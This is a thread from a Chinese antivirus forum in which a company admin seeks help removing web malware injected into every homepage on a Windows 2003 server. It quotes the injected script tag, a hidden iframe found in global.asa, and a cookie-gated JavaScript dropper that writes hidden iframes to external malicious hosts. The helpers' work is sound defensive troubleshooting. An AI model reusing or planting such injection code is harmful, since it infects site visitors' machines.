瑞星卡卡安全论坛

:kaka4:网页顶部代码无法删除,急!!!

网站首页顶部总是有病毒代码.已经用了很多方法清除,如:恶意代码清除器,强力杀等,查杀同时把疑是病毒的带he1p.asp后缀的连文件夹都删了

但现在从浏览器里一打开首页还是有.目前软件查杀已经杀不出病毒了。从网页源代码里看也是干净的.怎么能把那段代码去掉.尽量不想重做服务器.:kaka4:

望各位大侠给支支招!!

用户系统信息：Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; 360SE)

附件: ts.jpg

那段代码，在网站服务器上，网站页面文件里清除了，还会生成？
网站地址是什么？

网页顶部代码无法删除,急!!!

网站首页顶部总是有病毒代码.已经用了很多方法清除,如:恶意代码清除器,强力杀等,查杀同时把疑是病毒的带he1p.asp后缀的连文件夹都删了

但现在从浏览器里一打开首页还是有.目前软件查杀已经杀不出病毒了。从网页源代码里看也是干净的.怎么能把那段代码去掉.尽量不想重做服务器.

望各位大侠给支支招!!

用户系统信息：Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; 360SE)

是的.用杀毒软件断网查杀了好几次,已经杀不出毒来了.
网页代码我也都检查过了,是干净的.
但就是首页顶部一直有那段代码,去不掉.从网页里看不到这段,只是从浏览器打开就有.
网址是http://www.ineast.com

服务器是托管的啊？装个arp防火墙试试。

是我们公司自己的服务器.
装的360,上面有ARP的防护.但是一直有.主要是想把这段代码赶紧去掉.或是找出源头.
我的QQ号:79978070,您可以加我.

黑客加的代码吧 或许是后门 - -噗

在网站服务器上全盘搜索global.asa这个文件，如果有压缩发来。搜索时再更多高级选项里勾选搜索隐藏的文件和文件夹。

急!!我们的服务器是WIN2003的,最近所有的网站首页顶部都被代入一段代码,从源文件里看不到,无法删除,360杀毒也杀不出来什么,用了其他的一些工具也不行.请问有没有高手能帮忙解决@@急!!代码如下:
<script language=javascript src=http://f%70r.A%74Her%53ite.c%6Fm/b.js?google=7x011></script>

与此同时发现系统文件夹里有一个CryptWan.dll文件夹是病毒吗 ,删除或是打开这个文件都不行,提示拒绝访问.
还用UNLOCKER和恶意代码清除器分别尝试了,也没有作用.

用户系统信息：Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; 360SE)

将CryptWan.dll压缩跟帖上传。

下载sreng工具扫描日志压缩发来，在服务器上扫描
http://www.kztechs.com/sreng/download.html

CryptWan.dll，不能压缩，报一个：不能读取 C:\WINDOWS\system32\CryptWan.dll\* 的内容
打开的话就报拒绝访问。
现在正在全盘搜索：global.asa这个文件

正在扫描日志，先把搜到的global.asa文件发上来

用户系统信息：Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; 360SE)

附件: global扫描结果.rar

这是查到的
global.asa文件.
http://bbs.ikaka.com/showtopic-9176921.aspx

现将扫描好的日志发上来,您给看看.

用户系统信息：Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; 360SE)

附件: SREngLOG.log

http://bbs.ikaka.com/showtopic-9176923.aspx
这里面的附件是扫描的日志结果.您看看.谢谢:kaka1:

c:\documents and settings\all users\application data\nul.bcdatax.img  找到压缩发来。
另wbwchat目录下的global.asa文件有问题，都会链接到：<iframe src=http://aaa.369678.cn/bumian12.htm width=50 height=1></iframe>，虽然已失效，查看一下，如果不是网站的正常文件，建议删除。

nul.bcdatax.img,这个文件拷不出来,也是删不了,一拷就报:参数不正确.
wbwchat下面的.asa文件都删了.

nul.bcdatax.img这个文件能删掉吗?:kaka2:

已加QQ，请尽快通过验证。

网站首页总被挂马,这是从挂马的网址里提取的,能不能帮着分析一下,看能不能在服务器上把这个病毒文件找出来删掉以!!跪求!!

function baiduuu(){
var Then = new Date()
Then.setTime(Then.getTime() + 12*60*60*1000)
var cookieString = new String(document.cookie)
var cookieHeader = "Cookvie1="
var beginPosition = cookieString.indexOf(cookieHeader)
if (beginPosition != -1){
} else
{
var xinsi="yztq";
var fire="<ifra"+"me sr";
document.cookie = "Cookvie1=mikaila;expires="+ Then.toGMTString()
document.write("<div style=\'dispaly:none;\' >");
document.write(fire+"c=http:\/\/vni.Jkub.com:89\/2\/niay.htm wid"+"th=100 hei"+"ght=0><\/ifr"+"ame>");
document.write("</div>");
}
}baiduuu();

用户系统信息：Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)

这是通过判断cookie来进行挂马操作啊，并不能通过这段代码找到相应的病毒文件。

我该怎么在服务器上查找这段代码?清缓存和COOKIE?
您有没有好用的工具可以给推荐一下?谢谢

主要是针对客户端的啊:kaka6:

您是说这个代码不在服务器上?

要不您加我一下QQ

我QQ:79978070

挂的网页代码应该是 利用暴雷漏洞的